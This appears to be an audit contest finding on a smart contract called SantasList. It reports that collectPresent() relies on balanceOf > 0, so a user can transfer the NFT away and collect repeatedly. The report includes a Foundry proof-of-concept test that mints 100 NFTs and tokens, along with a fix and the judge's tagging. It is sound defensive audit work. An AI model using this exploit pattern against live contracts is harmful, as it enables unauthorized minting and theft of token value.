Submission Details
Severity:
Extra nice user can mint unlimited
Summary
When Santa set user to extra nice twice the user can mint unlimited SantaTokens and NFTs (when only nice once unlimited NFTs)
Vulnerability Details
if (balanceOf(msg.sender) > 0) {
revert SantasList__AlreadyCollected();
}
When the user collected the rewards the user can send the NFT to another user and keep collecting NFTs. When Extra nice twice it can also collect unlimited tokens
POC
function test_extraNiceCanMintUnlimited() public {
// when a user is set to extra nice by santa it can abuse and mint unlimited NFTS & Tokens
vm.startPrank(santa);
santasList.checkList(malicious, SantasList.Status.EXTRA_NICE);
santasList.checkTwice(malicious, SantasList.Status.EXTRA_NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(malicious);
santasList.setApprovalForAll(alice, true);
for (uint256 i = 0; i < 100; i++) {
santasList.collectPresent();
santasList.transferFrom(malicious, alice, i);
}
assertEq(santasList.balanceOf(alice), 100);
assertEq(santaToken.balanceOf(malicious), 100e18);
}
Impact
User can mint unlimited tokens or NFTs
Tools Used
Foundry
Recommendations
Add a mapping per address that stores when a user collected the present
Updates
Lead Judging Commences
inallhonesty over 1 year ago
Submission Judgement Published Assigned finding tags:
Weak Already Collected Check
Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.
Rewards breakdown
nSLOC
116This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.